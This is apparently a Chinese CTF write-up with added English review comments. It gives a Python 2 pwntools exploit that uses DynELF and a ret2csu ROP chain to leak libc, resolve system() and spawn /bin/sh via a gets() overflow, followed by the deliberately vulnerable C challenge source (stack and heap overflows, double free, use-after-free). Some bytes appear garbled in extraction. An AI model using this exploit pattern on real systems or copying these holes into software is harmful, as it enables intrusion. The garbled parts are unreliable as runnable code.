这几天有同学问我在 64 位下怎么用这个函数，于是针对同一道题写了一个利用 DynELF 的方法
编译好的程序 http://pan.baidu.com/s/1jImF95O
源码在后面
"""CTF writeup script (Python 2 / pwntools): a ROP chain built on the gets()
overflow in pwn_final, using pwntools' DynELF to locate libc's system().

Review notes (defender's view):
  * The primitive is an unbounded gets() into a 40-byte stack buffer in the
    target's get_name(); every payload below re-enters that function.
  * Every address in this file is fixed (the binary evidently has no PIE),
    and the chain never needs to know the libc build: DynELF resolves
    symbols purely from memory it can read through the leak() callback.
    A stack canary, PIE, or replacing gets() with a bounded read would each
    break a different link of this chain.
  * The listing was extracted from a web page and is not byte-accurate
    (e.g. the "x00" fillers below are three-character strings, so each is
    3*56 bytes long); treat it as illustrative rather than runnable.
  * Python 2 syntax throughout (print statement, str.encode('hex')).
"""
from pwn import *

elf = ELF('./pwn_final')

# GOT slot of write().  The chain appears to call through this slot rather
# than through a resolved address, so only a read of the slot is needed --
# note for defenders that Full RELRO (which only makes the GOT read-only)
# would not by itself stop this.
got_write = elf.got['write']
print 'got_write= ' + hex(got_write)
# Presumably main()'s call to get_name(); returning here re-runs the
# vulnerable read so the next payload can be delivered.  Value as given on
# the page.
call_get_name_func = 0x400966
print 'call_get_name_func= ' + hex(call_get_name_func)
got_read = elf.got['read']
print "got_read: " + hex(got_read)
# Fixed writable scratch address (value as given on the page; the name says
# .bss -- confirm with the section headers).
bss_addr = 0x6020c0
pad = 'a'

p = process('./pwn_final')
gdb.attach(p)

#get system address
def leak(address):
    """Arbitrary-read callback handed to DynELF.

    Sends a chain that, judging by its layout, calls write(1, address, 128)
    via the GOT and returns whatever the target writes back.  The two fixed
    gadget addresses with six values between them look like the usual
    __libc_csu_init pop/call pair (rbx=0, rbp=1, r12=&GOT[write],
    r13=count, r14=address, r15=fd) -- inferred from the pattern, confirm
    against the disassembly.

    Returns the raw bytes received (possibly fewer than 128, possibly empty
    if the chain did not run).
    """
    p.recvuntil('please enter your name:')
    # 56 bytes of filler reach the saved return address (40-byte buffer plus
    # alignment slack and saved rbp -- inferred, confirm in the frame layout).
    payload1 = pad * 56
    payload1 += p64(0x400d9a)+ p64(0) + p64(1) + p64(got_write) + p64(128) + p64(address) + p64(1) + p64(0x400d80)
    # Presumably filler for the register pops that follow the call gadget;
    # see the module docstring about its length as extracted.
    payload1 += "x00"*56
    payload1 += p64(call_get_name_func)
    p.sendline(payload1)
    # recv() returns whatever is available, not necessarily 128 bytes;
    # `data or ''` keeps the hex dump from failing on an empty reply.
    data = p.recv(128)
    print "%#x => %s" % (address, (data or '').encode('hex'))
    return data

# DynELF reads the target's dynamic-linker structures through leak(), one
# dereference at a time, until it can resolve 'system' in the mapped libc.
d = DynELF(leak, elf=ELF('./pwn_final'))
system_addr = d.lookup('system', 'libc')
print "system_addr=" + hex(system_addr)

#write system && /bin/sh
# Same gadget pair, now apparently calling read(0, bss_addr, 16) so that the
# resolved address and the command string land at a fixed writable location.
# The extra p64(0) after the first gadget suggests entry point 0x400d96
# consumes one more stack slot than 0x400d9a -- confirm.
payload2 = "a"*56
payload2 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(got_read) + p64(16) + p64(bss_addr) + p64(0) + p64(0x400d80)
payload2 += "x00"*56
payload2 += p64(call_get_name_func)
p.sendline(payload2)
# The 16 bytes read above: 8 bytes of address, then the string at bss_addr+8.
p.send(p64(system_addr))
p.send("/bin/sh ")
p.recvuntil('name:')

# call system
# Calls *bss_addr with the first argument pointing at bss_addr+8, i.e. the
# string sent above (register mapping inferred as in leak()).
payload3 = "a"*56
payload3 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(0) + p64(0) + p64(bss_addr+8) + p64(0x400d80)
payload3 += "x00"*56
payload3 += p64(call_get_name_func)
p.sendline(payload3)
p.interactive()
源码
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

/*
 * Source of the challenge binary (pwn_final).  The program is vulnerable by
 * design; the review comments below mark each defect and the change a
 * production build would need, so the listing reads as a catalogue of what
 * not to do rather than as a specification.  The code tokens are the page's
 * own; only line breaks and comments were added.
 */
void print_menu();
void get_name();
void add_paper();
void delete_paper();
void show_paper();
int get_num();
void get_input(char *buffer, int size, int no_should_fill_full);
void gg();

/* Ten heap slots.  Zero-initialised as a global, but never cleared after
 * free() (see delete_paper), so stale pointers survive in here. */
char *link_list[10];

/* Entry point: asks for a name (the unbounded read), then loops on the menu.
 * The setbuf() calls make stdio unbuffered so prompts are flushed at once. */
int main() {
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setbuf(stderr, 0);
    int choice;
    get_name();
    while (1){
        print_menu();
        choice = get_num();
        switch (choice){
            case 1: add_paper(); break;
            case 2: delete_paper(); break;
            case 3: show_paper(); break;
            /* Any choice outside 1..3 ends here.  `return;` without a value
             * in a non-void function is not valid C99; compilers usually
             * only warn, and the exit status is then unspecified. */
            default: return;
        }
    }
    /* Unreachable: the only exit from the loop is the return above. */
    printf("thank you!");
}

/* Reads one field via get_input() and parses it with strtol(), retrying
 * (recursively) until the text starts with a number. */
int get_num() {
    int result;
    /* Uninitialised, and get_input() does not NUL-terminate on every path
     * (size limit or EOF), so strtol() and the %s below can read past the
     * 48 bytes. */
    char input[48];
    char *end_ptr;
    get_input(input, 48, 1);
    result = strtol(input, &end_ptr, 0);
    if (input == end_ptr){
        printf("%s input is not start with number! ", input);
        /* Unbounded recursion on repeated bad input; on EOF get_input()
         * returns immediately, so this can recurse until the stack is
         * exhausted.  A loop would be the safer shape. */
        result = get_num();
    }
    return result;
}

/* Byte-at-a-time read of up to `size` bytes into `buffer`.
 * With no_should_fill_full set, the terminator character (shown as ' ' on
 * this page -- NOTE(review): possibly a newline whose escape was lost in
 * extraction, confirm against the original) is replaced by NUL and the
 * function returns, unless it is the very first byte, which is skipped.
 * The buffer is NOT NUL-terminated when the loop exits because `size`
 * bytes were consumed or because fread() returned 0 (EOF/error). */
void get_input(char *buffer, int size, int no_should_fill_full) {
    int index = 0;
    char *current_location;
    int current_input_size;
    while (1){
        current_location = buffer+index;
        current_input_size = fread(buffer+index, 1, 1, stdin);
        if (current_input_size <= 0) break;
        if (*current_location == ' ' && no_should_fill_full){
            if (index){
                *current_location = 0;
                return;
            }
        }else{
            index++;
            /* Exits without writing a terminator once the buffer is full. */
            if (index >= size) break;
        }
    }
}

/* Root cause of the writeup's exploit: gets() has no length limit, so input
 * longer than 40 bytes overwrites the saved frame and return address.
 * Fix: fgets(name, sizeof(name), stdin) (or the bounded get_input() above);
 * -fstack-protector and PIE would additionally make the remaining bug much
 * harder to turn into control-flow hijack. */
void get_name() {
    char name[40];
    printf("please enter your name:");
    gets(name);
}

/* Menu text; no input involved. */
void print_menu() {
    puts("Welcome to use the improved paper management system!");
    puts("1 add paper");
    puts("2 delete paper");
    puts("3 show paper");
}

/* Prints `length` bytes of slot `index`.  Defects:
 *  - scanf()'s result is unchecked, so on non-numeric input `index` and
 *    `length` are compared while still uninitialised;
 *  - write() takes an int file descriptor but is handed the FILE* stdout
 *    (the same mistake as read(stdin, ...) in gg());
 *  - link_list[index] may be NULL (never added) or dangling (after
 *    delete_paper), so this reads unmapped or freed memory;
 *  - `length` is only checked against 0..2048, never against the slot's
 *    allocation, so it can disclose adjacent heap memory. */
void show_paper() {
    int index;
    int length;
    printf("Input the index of the paper you want to show(0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9) exit(1);
    printf("How long you will enter:");
    scanf("%d", &length);
    if (length < 0 || length > 2048) exit(1);
    write(stdout, link_list[index], length);
}

/* Allocates `length` bytes for slot `index` and fills it with gets().
 *  - gets() ignores `length`, so longer content overflows the heap chunk;
 *  - length == 0 passes the range check and yields malloc(0);
 *  - a pointer already in the slot is overwritten without free() (leak);
 *  - scanf()'s result is unchecked, as in show_paper().
 * Fix: a read bounded by `length` (fgets/read), and free the old slot first. */
void add_paper() {
    int index;
    int length;
    printf("Input the index you want to store(0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9) exit(1);
    printf("How long you will enter:");
    scanf("%d", &length);
    if (length < 0 || length > 2048) exit(1);
    link_list[index] = malloc(length);
    if (link_list[index] == NULL) exit(1);
    printf("please enter your content:");
    gets(link_list[index]);
    printf("add success! ");
}

/* Frees slot `index` but leaves the pointer in link_list, so deleting the
 * same slot twice is a double free and a later show_paper() on it is a
 * use-after-free read.  Fix: link_list[index] = NULL; after free(). */
void delete_paper() {
    int index;
    printf("which paper you want to delete,please enter it's index(0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9) exit(1);
    free(link_list[index]);
    puts("delete success !");
}

/* Not called from main(); its purpose is not visible on this page.  The
 * read itself is bounded (40 bytes into a 40-byte buffer), but read() is
 * given the FILE* stdin instead of file descriptor 0. */
void gg() {
    char name[40];
    read(stdin, name, 40);
}